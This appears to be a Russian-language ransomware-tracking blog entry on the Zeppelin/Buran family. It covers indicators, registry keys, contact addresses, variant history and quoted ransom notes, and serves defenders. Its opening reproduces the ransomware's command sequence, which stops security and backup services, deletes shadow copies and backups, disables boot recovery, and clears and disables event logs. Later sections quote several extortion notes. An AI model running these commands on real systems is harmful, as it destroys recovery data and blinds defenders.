net stop MSSQL$SHAREPOINT /y

net stop MSSQL$SOPHOS /y

net stop MSSQL$SQLEXPRESS /y

net stop MSSQL$SQL_2008 /y

net stop MSSQL$SYSTEM_BGC /y

net stop MSSQL$TPS /y

net stop MSSQL$TPSAMA /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop MSSQL$VEEAMSQL2012 /y

net stop MSSQLFDLauncher /y

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

net stop MSSQLFDLauncher$SBSMONITORING /y

net stop MSSQLFDLauncher$SHAREPOINT /y

net stop MSSQLFDLauncher$SQL_2008 /y

net stop MSSQLFDLauncher$SYSTEM_BGC /y

net stop MSSQLFDLauncher$TPS /y

net stop MSSQLFDLauncher$TPSAMA /y

net stop MSSQLSERVER /y

net stop MSSQLServerADHelper /y

net stop MSSQLServerADHelper100 /y

net stop MSSQLServerOLAPService /y

net stop McAfeeEngineService /y

net stop McAfeeFramework /y

net stop McAfeeFrameworkMcAfeeFramework /y

net stop McShield /y

net stop McTaskManager /y

net stop MsDtsServer /y

net stop MsDtsServer100 /y

net stop MsDtsServer110 /y

net stop MySQL57 /y

net stop MySQL80 /y

net stop NetMsmqActivator /y

net stop OracleClientCache80 /y

net stop PDVFSService /y

net stop POP3Svc /y

net stop RESvc /y

net stop ReportServer /y

net stop ReportServer$SQL_2008 /y

net stop ReportServer$SYSTEM_BGC /y

net stop ReportServer$TPS /y

net stop ReportServer$TPSAMA /y

net stop SAVAdminService /y

net stop SAVService /y

net stop SDRSVC /y

net stop SMTPSvc /y

net stop SNAC /y

net stop SQLAgent$BKUPEXEC /y

net stop SQLAgent$CITRIX_METAFRAME /y

net stop SQLAgent$CXDB /y

net stop SQLAgent$ECWDB2 /y

net stop SQLAgent$PRACTTICEBGC /y

net stop SQLAgent$PRACTTICEMGT /y

net stop SQLAgent$PROD /y

net stop SQLAgent$PROFXENGAGEMENT /y

net stop SQLAgent$SBSMONITORING /y

net stop SQLAgent$SHAREPOINT /y

net stop SQLAgent$SOPHOS /y

net stop SQLAgent$SQLEXPRESS /y

net stop SQLAgent$SQL_2008 /y

net stop SQLAgent$SYSTEM_BGC /y

net stop SQLAgent$TPS /y

net stop SQLAgent$TPSAMA /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop SQLAgent$VEEAMSQL2012 /y

net stop SQLBrowser /y

net stop SQLSERVERAGENT /y

net stop SQLSafeOLRService /y

net stop SQLTELEMETRY /y

net stop SQLTELEMETRY$ECWDB2 /y

net stop SQLWriter /y

net stop SamSs /y

net stop SepMasterService /y

net stop ShMonitor /y

net stop SmcService /y

net stop Smcinst /y

net stop SntpService /y

net stop SstpSvc /y

net stop TmCCSF /y

net stop TrueKey /y

net stop TrueKeyScheduler /y

net stop TrueKeyServiceHelper /y

net stop UI0Detect /y

net stop VeeamBackupSvc /y

net stop VeeamBrokerSvc /y

net stop VeeamCatalogSvc /y

net stop VeeamCloudSvc /y

net stop VeeamDeploySvc /y

net stop VeeamDeploymentService /y

net stop VeeamEnterpriseManagerSvc /y

net stop VeeamHvIntegrationSvc /y

net stop VeeamMountSvc /y

net stop VeeamNFSSvc /y

net stop VeeamRESTSvc /y

net stop VeeamTransportSvc /y

net stop W3Svc /y

net stop WRSVC /y

net stop bedbg /y

net stop ekrn /y

net stop kavfsslp /y

net stop klnagent /y

net stop macmnsvc /y

net stop masvc /y

net stop mfefire /y

net stop mfemms /y

net stop mfevtp /y

net stop mozyprobackup /y

net stop msftesql$PROD /y

net stop ntrtscan /y

net stop sacsvr /y

net stop sophossps /y

net stop svcGenericHost /y

net stop swi_filter /y

net stop swi_service /y

net stop swi_update /y

net stop swi_update_64 /y

net stop tmlisten /y

net stop wbengine /y

net stop wbengine /y

bcdedit /set {default} bootstatuspolicy ignoreallfailures

bcdedit /set {default} recoveryenabled no

wbadmin delete catalog -quiet

wbadmin delete systemstatebackup

wbadmin delete systemstatebackup -keepversions:0

wbadmin delete backup

wmic shadowcopy delete

vssadmin delete shadows /all /quiet

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

attrib "%userprofile%\documents\Default.rdp" -s -h

del "%userprofile%\documents\Default.rdp"

wevtutil.exe clear-log Application

wevtutil.exe clear-log Security

wevtutil.exe clear-log System

sc config eventlog start=disabled

Список завершаемых процессов:

agntsvc.exe, agntsvc.exeagntsvc.exe, agntsvc.exeencsvc.exe, agntsvc.exeisqlplussvc.exe, anvir.exe, anvir64.exe, apache.exe, backup.exe, ccleaner.exe, ccleaner64.exe, dbeng50.exe, dbsnmp.exe, encsvc.exe, far.exe, firefoxconfig.exe, infopath.exe, isqlplussvc.exe, kingdee.exe, msaccess.exe, msftesql.exe, mspub.exe, mydesktopqos.exe, mydesktopservice.exe, mysqld-nt.exe, mysqld-opt.exe, mysqld.exe, ncsvc.exe, ocautoupds.exe, ocomm.exe, ocssd.exe, oracle.exe, oracle.exe, procexp.exe, regedit.exe, sqbcoreservice.exe, sql.exe, sqlagent.exe, sqlbrowser.exe, sqlserver.exe, sqlservr.exe, sqlwriter.exe, synctime.exe, taskkill.exe, tasklist.exe, taskmgr.exe, tbirdconfig.exe, tomcat.exe, tomcat6.exe, u8.exe, ufida.exe, visio.exe, xfssvccon.exe

Список файловых расширений, подвергающихся шифрованию:
Популярные типы расширений, кроме тех, что находятся в списках  игнорируемых. 

Это наверняка будут документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Список игнорируемых расширений:

.bat, .cmd, .com, .cpl, .dll, .msc, .msp, .pif, .scr, .sys, .log, .lnk, .zeppelin

Список игнорируемых директорий:

\Windows\ 

\Windows.old\ 

\$Windows.~bt\ 

\System Volume Information\ 

\intel\ 

\nvidia\ 

\inetpub\logs\

\All Users\ 

\AppData\ 

\Apple Computer\Safari\ 

\Application Data\ 

\Boot\ 

\Google\ 

\Google\Chrome\ 

\Mozilla Firefox\ 

\Mozilla\ 

\Opera Software\ 

\Opera\ 

\Tor Browser\ 

\Common Files\ 

\Internet Explorer\ 

\Windows Defender\ 

\Windows Mail\ 

\Windows Media Player\ 

\Windows Multimedia Platform\ 

\Windows NT\ 

\Windows Photo Viewer\ 

\Windows Portable Devices\ 

\WindowsPowerShell\ 

\Windows Photo Viewer\ 

\Windows Security\ 

\Embedded Lockdown Manager\ 

\Windows Journal\ 

\MSBuild\ 

\Reference Assemblies\ 

\Windows Sidebar\ 

\Windows Defender Advanced Threat Protection\ 

\Microsoft\ 

\Package Cache\ 

\Microsoft Help\ 

Список пропускаемых файлов:
boot.ini, bootfont.bin, bootsect.bak, desktop.ini, iconcache.db, ntdetect.com, ntldr, ntuser.dat, ntuser.dat.log, ntuser.ini, thumbs.db

Файлы, связанные с этим Ransomware:
readme.txt
svchost.exe
<random>.exe - случайное название вредоносного файла
1767D234-B440-8A0A-8098-4692C8B2B5A8_unlocker.exe

Расположения:
C:\.zeppelin
C:\Users\.zeppelin  и другие
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
\USER\S-*\Software\Buran V\Stop
HKEY_CURRENT_USER\Software\Zeppelin
HKEY_CURRENT_USER\Software\Zeppelin\Keys
HKEY_CURRENT_USER\Software\Zeppelin\Keys\Encrypted Private Key
HKEY_CURRENT_USER\Software\Zeppelin\Keys\Public Key
HKEY_CURRENT_USER\Software\Zeppelin\Knock
HKEY_CURRENT_USER\Software\Zeppelin\Paths
HKEY_CURRENT_USER\Software\Zeppelin\Paths\0
HKEY_CURRENT_USER\Software\Zeppelin\Stop
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: zeppelindecrypt@420blaze.it, zeppelin_helper@tuta.io
Jabber: zeppelin_decrypt@xmpp.jp
BTC: - 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>

𝚺  VirusTotal analysis >>  VT> VT> VT> VT>
𝚺  VirusTotal analysis (decryptor) >> 
🐞 Intezer analysis >>  IA>
ᕒ  ANY.RUN analysis >>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: средняя.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== === RANSOMWARE BUILDER ===

Здесь мы можем видеть, что название записки можно менять. 
На скриншоте это !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

Vega (VegaLocker) Ransomware - февраль 2019
Jamper (Jumper) Ransomware - март, апрель, май 2019
Buran Ransomware - май 2019
Buran 2.0 Ransomware - июнь 2019
Buran-Ghost Ransomware - июнь 2019
Buran-Storm Ransomware - июнь, сентябрь 2019
Zeppelin Ransomware - декабрь 2019 -> апрель 2020 -> 2021

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Вариант от 28 ноября 2019:
Сообщение >>
Расширение (пример): .BB4-230-123
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Email: buratino@firemail.cc, buratino2@tutanota.com, buratin@torbox3uiot6wchz.onion
Результаты анализов: VT + IA

➤ Содержание записки о выкупе:
Need decrypt your data?
Write on e-mail:
buratino@firemail.cc
Your personal ID:
BB4-232-232
Additional e-mails:
buratino2@tutanota.com
buratin@torbox3uiot6wchz.onion (access only from tor)

Вариант от 8-9 декабря 2019:
Сообщение >>
Расширение (шаблон): .XXX-XXX-XXX
Пример расширения: .276-A80-137
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Email: angry_war@protonmail.ch
Результаты анализов: VT + VMR

Вариант от 11-12 декабря 2019:
Статья на сайте Cylance >>
Статья на сайте BC >>


Вариант от 19 декабря 2019:
Сообщение >>
Email: cheet0s_de@protonmail.com, Pringls_us@protonmail.com 
Файл: LilDroidSoftwareload.exe

 

URL (временный): hxxxs://anonfiles.com/ZbSdO8G0nc/bb_zip
AZORult может украсть криптовалюту и банковскую информацию, включая пароли и данные кредитной карты. Это регулярно обновляемое вредоносное ПО для кражи информации продолжает оставаться активной угрозой.
Результаты анализов на zip-архив: VT + AR + HA

➤ Содержание записки о выкупе:
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: cheet0s_de@protonmail.com and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: cheet0s_de@protonmail.com 
Reserved email: Pringls_us@protonmail.com 
Your personal ID: 775-43E-***
Attention!
 * Do not rename encrypted files.
 * Do not try to decrypt your data using third party software, it may cause permanent data loss.
 * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.


Вариант от 19 декабря 2019:
Сообщение >>
Расширение (шаблон): .zeppelin и .XXX-XXX-XXX

Пример расширения: .781-1F7-E11
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Email: helpservis@horsefucker.org
Результаты анализов: VT + AR + VMR

➤ Содержание записки о выкупе:
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: helpservis@horsefucker.org and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: helpservis@horsefucker.org
Your personal ID: 781-1F7-E11
Attention!
 * Do not rename encrypted files.
 * Do not try to decrypt your data using third party software, it may cause permanent data loss.
 * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Вариант от 19-24 декабря 2019:
Сообщение >>
Расширение (шаблон): .XXX-XXX-XXX и .zeppelin
Пример расширения: .F3D-0BB-E7E
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Результаты анализов: VT + VT


Вариант от 22 декабря 2019:
Сообщение >>
Расширение (шаблон): .XXX-XXX-XXX и .zeppelin
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Файлы: LilDroidSofwareload.exe, zaebalsiarealy.exe

=== 2020 ===

Вариант от 9 января 2020:
Сообщение >>
Расширение: .XXX-XXX-XXX и .zeppelin
Email: ret3pwn@gmail.com
Записка (на турецком языке): !!! CONTACT !!!.TXT
Результаты анализов: VT + HA + IA + AR + AR

➤ Содержание записки: 
contact addres : ret3pwn@gmail.com
ip numaraniz : { google.com da ip goster yazip sitelerden ögrenebilirsiniz }
senin kodun : tXZ01
verileriniz sifrelendi verilerinizin cozulmesini hacklendigi gunki haline
donmesini istiyorsaniz bize ulasin verilerinizi cozmeniz konusunda yardim edelim
1- nasil hacklendiginizi öğreneceksiniz
2- tekrar hacklenmemek icin bizden oneriler ve yardimlar alacaksin
3- sifrelenen verilerin acilicek sistemin eski haline gelicek
4- guvenli ve cok saglam bir sistem kurman icin bilgiler öneriler vereceğiz
5- daha once bizim tarafimizdan hacklenmis yardim gormus verisi acilmis
bir firma ile gorusturecegiz. goruşmeden once ciddi oldugunuzu bilmemiz icin
size teklif edilen odemeyi hazirlamis olmaniz gerekir. odeme yolu ve bilgisi
mail ile verilicektir
not : verinizi acamayacagimizdan suphe duyarsaniz sizin için önemi olmayan
ama cozebilecegimizi gosteren basit bir dosya yollayabilirsiniz
mail ile istediklerimiz
1- ip numaraniz
2- senin kodun
3- cozmemizi isterseniz ornek bir dosya


Вариант от 9 января 2020:
Сообщение >>
Расширение: .XXX-XXX-XXX
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!
Email: cheot0s_de@protonmail.com
Pringls_us@protonmail.com
➤ Содержание записки: 
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to p***
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: cheot0s_de@protonmail.com
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: cheot0s_de@protonmail.com
'Reserved email: Pringls_us@protonmail.com
Your personal ID: xxx-xxx-xxx
Attention!
• Do not rename encrypted files.
• Do not try to decrypt your data using third party software, it may cause permanent***
• Decryption of your files with the help of third parties may cause increased price***


Вариант от 21 января 2020:
Сообщение >>
Расширение (шаблон): .XXX-XXX-XXX и .zeppelin
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Email: puljaipopre1981@protonmail.com, viomukinam1978@protonmail.com
Результаты анализов: VT + VMR + IA / VT + VMR

Вариант от 9 февраля 2020:
Пост на форуме >>
Расширение (шаблон): .XXX-XXX-XXX и .zeppelin
Пример расширения: .2BF-510-92E
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Email: onlinebigbrotheriswatchingyou@protonmail.com
onlinebigbrotheriswatchingyou@tutanota.com

➤ Содержание записки:
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: onlinebigbrotheriswatchingyou@protonmail.com or onlinebigbrotheriswatchingyou@tutanota.com and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: onlinebigbrotheriswatchingyou@protonmail.com
Reserved email: onlinebigbrotheriswatchingyou@tutanota.com
Your personal ID: 2BF-515-95E
Attention!
 * Do not rename encrypted files.
 * Do not try to decrypt your data using third party software, it may cause permanent data loss.
 * Decryption of your files with the help of third parties may cause increased price (they add their fee to our).
To avoid getting your computer infected AGAIN  you should be very careful when downloading software - the only safe place to download applications is their developer website or official app store. Be very careful when opening attachments in your email inbox - even legitimate looking emails can be a part of social engineering created by BIG BROTHER. You are advised keep your  operating system and installed software up-to-date. Use legitimate antivirus and anti-spyware programs and do not click on links or open email attachments from untrusted sources. Avoid visiting pornographic websites and do not download files from P2P  services such as torrents and never use software cracks or game cheats - these are very common places where cyber criminals distribute their malicious software.


Вариант от 20 февраля 2020:
Сообщение >>
Enail: msupport2019@protonmail.com, msupport@elude.in
Файл: Aksip.exe
Результаты анализов: VT + VMR
Обнаружения: 
DrWeb -> Trojan.Encoder.31068
BitDefender -> Trojan.GenericKD.33337236
ESET-NOD32 -> A Variant Of Win32/Kryptik.GZWI
McAfee -> Trojan-FRUJ!61506482DDD2
TrendMicro -> Trojan.Win32.MALREP.THBBDBO
Symantec -> Trojan.Gen.2

Вариант от 21 февраля 2020:
Сообщение >>
Расширение (шаблон): .XXX-XXX-XXX и .zeppelin
Email: sambrero@tfwno.gf, dupsano@cock.lu
Записка: Warning!.txt

Как и прежде добавляет ³ZEPPELIN³ в начало зашифрованного файла.
Раздел реестра не изменился: HKEY_CURRENT_USER\Software\Zeppelin
Результаты анализов: VT + IA
Обнаружения: 
DrWb -> Trojan.Encoder.25574
BitDefender -> Trojan.GenericKD.33349310
ESET-NOD32 -> Win32/Filecoder.Buran.H
Malwarebytes -> Backdoor.XTRat
Microsoft -> Ransom:Win32/Zeppelin.B!MSR
TrendMicro -> Ransom_Zeppelin.R011C0DBN20


Вариант от 6 апреля 2020:
Пост на форуме >>
Расширение (шаблон): .XXX-XXX-XXX и .zeppelin
Email: MattCohn@tutanota.com, BruceCohn88@protonmail.com 
➤ Содержание записки:
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: MattCohn@tutanota.com  and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: MattCohn@tutanota.com
Reserved email: BruceCohn88@protonmail.com
Your personal ID: E69-CE5-209
Attention!
 * Do not rename encrypted files.
 * Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.


Вариант от 12 апреля 2020:
Сообщение >>
Расширение (шаблон): .XXX-XXX-XXX и .zeppelin
Email: unlocking2020@protonmail.ch, burlocker2020@tuta.io
Записка: Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Результаты анализов: VT 

 

Вариант от 14 апреля 2020:
Пост на форуме >>
Расширение (шаблон): .XXX-XXX-XXX и .zeppelin
Email: unlocking2020@protonmail.ch, burlocker2020@tuta.io
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Email: runlocker@protonmail.com, ranlock@keemail.me 
Результаты анализов: VT 
➤ Содержание записки: 
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: runlocker@protonmail.com and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: runlocker@protonmail.com
Reserved email: ranlock@keemail.me 
Your personal ID: 145-XXX-XXX
Attention!
 * Do not rename encrypted files.
 * Do not try to decrypt your data using third party software, it may cause permanent data loss.
 * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.


Вариант от 29 мая 2020:
Пост на форуме >>
Расширение (шаблон): .XXX-XXX-XXX
Записка: RECOVERY DATA INFORMATION.TXT
Email: cluff_sarah@aol.com

➤ Содержание записки: 
Hello!
If you see this message - this means your files are now encrypted and are in a non-working state!  Now only we can help you recover.
If you are ready to restore the work - send us an email to the address cluff_sarah@aol.com  In the letter, specify your personal identifier, which you will see below.  In the reply letter we will inform you the cost of decrypting your files.
Also from your servers, files were downloaded to our cloud storage, such as:
Documents, accounting and tax reporting files, scanned copies of passports, driver's licenses of SQL, MySQL database, database with financial information ...
After we agree, you will receive a decryption program,  as well as all your files on our server will be deleted.
Otherwise, they will fall into the open access of the Internet!
Before payment you can send us 1-2 files for test decryption.  We will decrypt the files you requested and send you back.  This ensures that we own the key to recover your data.  The total file size should be no more than     3 MB, the files should not contain valuable information (databases, backups, large Excel spreadsheets ...).
Please be sure that we will find common languge. We will restore all the data.
Email to contact us - cluff_sarah@aol.com
Attention!
 * Do not rename encrypted files.
 * Do not try to decrypt your data using third party software, it may cause permanent data loss.
Your personal ID: 2AC-EFF-XXX


Вариант от 22 июля 2020:
Пост на форуме >>
Расширение (шаблон): .XXX-XXX-XXX
Email: restmefast@tutanota.com
➤ Содержание записки: 
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: restmefast@tutanota.com  and decrypt one file for free.
Attention!
 * Do not rename encrypted files.
 * Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.


Вариант от 22 июля 2020:
Топик на форуме >>
Расширение (шаблон): .XXX-XXX-XXX
Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!
Email: helpservise@mail2tor.com
helpservise@ctemplar.com
recovery2020@cock.li
➤ Содержание записки: 
!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: helpservise@mail2tor.com and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: helpservise@mail2tor.com
Reserved email: helpservise@ctemplar.com
Reserved email2: recovery2020@cock.li
Your personal ID: 20D-977-***
Attention!
 * Do not rename encrypted files.
 * Do not try to decrypt your data using third party software, it may cause permanent data loss.
 * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.


Вариант от 7 сентября 2020:
Топик на форуме >>
Email: yesbay@protonmail.com
➤ Содержание записки о выкупе: 
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an email: yesbay@protonmail.com and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
Write to email: yesbay@protonmail.com
Your personal ID: AFA-XXX-XXX
Attention!
 * Do not rename encrypted files.
 * Do not try to decrypt your data using third party software, it may cause permanent data loss.
 * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Вариант от 8 ноября 2020:

Сообщение >>

Результаты анализов: VT + IA

Вариант от 4 декабря 2020:

Сообщение >>

Расширение (шаблон): .XXX-XXX-XXX

Email: sambrero@tfwno.gf, dupsano@cock.lu

Telegram: t.me/Albroudy

➤ Содержание записки о выкупе: 

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities – nobody will not cooperate with us. Its not in our interests. To be sure we have the decryptor and it works you can send an email: sambrero@tfwno.gf and decrypt one file for free.

But this file should be not valuable!

If you will not cooperate with our service – for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice – time is much more valuable than money.

Write to email: sambrero@tfwno.gf

Telegram: t.me/Albroudy

Reserved email: dupsano@cock.lu

Your personal ID: 

!!! DANGER !!!

DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions – its may entail damage of the private key and, as result, The Loss all data.

!!! !!! !!!

ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.

!!! !!! !!!

Вариант от 15 декабря 2020:

Расширение (шаблон): .XXX-XXX-XXX

Email: wiruxa@airmail.cc, anygrishevich@yandex.ru 

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Вариант от 17 декабря 2020:

Топик на форуме >>

Расширение (шаблон): .XXX-XXX-XXX

Email: uspex1@cock.li, uspex2@cock.li

Telegram: @uspex2

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Вариант от 29 декабря 2020: 

Сcылка на идентификацию >>

Расширение (шаблон): .XXX-XXX-XXX

Email: China.Helper@aol.com

Ранее этот email-адрес использовался в Alco Ransomware. 

Записка: !!! HOW TO BACK YOUR FILES !!!.TXT

Вариант от 4 января 2021: 

Пост на форуме >>

Расширение (шаблон): .XXX-XXX-XXX

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Email: regina4hgoregler@gmx.com, pansymarquis@yahoo.com

Вариант от 4 марта 2021: 

Расширение (шаблон): .XXX-XXX-XXX

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Email: filescrps@protonmail.ch, filescrp@420blaze.it, filescrp@yandex.ru

Результаты анализов: VT + AR

Вариант от 23 марта 2021: 

Расширение (шаблон): .XXX-XXX-XXX

Email: helpservisee@ctemplar.com, helpservisee@cock.li

Вариант от 23 апреля 2021:

Сообщение >>

Расширение (шаблон): .XXX-XXX-XXX

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Email: rootiunik@cock.li, TimothyCrabtree@protonmail.com

Вариант от 9 мая 2021: 

Сообщение >>

Email: helpoperator2@protonmail.com, helpoperator@firemail.cc

Jabber: helpoperator@thesecure.biz

Вариант от 12 июля 2021: 

Сообщение >>

Email: udacha123@mail2tor.com 

Telegram: @udacha123yes 

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

➤ Содержание записки: 

!!! ALL YOUR FILES ARE ENCRYPTED !!!

All your files, documents, photos, databases and other important files are encrypted.

You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.

Only we can give you this key and only we can recover your files.

To be sure we have the decryptor and it works you can send an email: udacha123@mail2tor.com and decrypt one file for free.

But this file should be of not valuable!

Do you really want to restore your files?

Write to email: udacha123@mail2tor.com 

telegram @udacha123yes 

100$=24 hour 

Attention 

!!! in 24 hours the price will increase 3 times 

!!! have time to pay 

Your personal ID: 1D5-XXX-XXX

Attention!

 * Do not rename encrypted files.

 * Do not try to decrypt your data using third party software, it may cause permanent data loss.

 * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Вариант от 27 июля 2021:

Сообщение >>

Расширение: .kikiriki

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Вариант от 6 августа 2021: 

Сообщение >>

Расширение: .payfast500 

Расширение: .XXX-XXX-XXX

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Email: payfast500@mail2tor.com 

BTC: bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 

Telegram: @payfast500

Результаты анализов: VT

Вариант от 12 августа 2021: 

Сообщение >>

Расширение: .payfast290

Расширение: .XXX-XXX-XXX

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Email: payfast290@mail2tor.com 

BTC: bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 

Telegram: @payfast290 

Вариант от 4 октября 2021: 

Сообщение >>

Расширение: .@payfast500 

Расширение: .XXX-XXX-XXX

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Вариант от 19 октября 2021: 

Сообщение >>

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Email: payransom500@mail2tor.com 

Telegram: @payransom500 

BTC: bc1qas8m3c2jv4uyurxacdt99ujj6gp6xt4tqeul8l 

Вариант от 16 декабря 2021:

Сообщение >>

Записка: YOUR FILES ARE STEALED AND ENCRYPTED.txt

Email: GoodDay@privatemail.com

Вариант от 19 января 2022:

Сообщение >>

Расширение: .@KUKANOSSOSANOS.XXX-XXX-XXX

Записка: !!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Email: kukanossosanos@onionmail.org

ICQ: @KUKANOSSOSANOS

Результаты анализов: VT

 

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter: myTweet + Tweet, Tweet, Tweet
 ID Ransomware (ID as Zeppelin)
 Write-up, Topic of Support
 Added later: Write-up by BlackBerry Cylance

 Thanks: 
 Andrew Ivanov (author)
 Michael Gillespie, Vitali Kremez, dnwls0719
 Marcelo Rivero
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.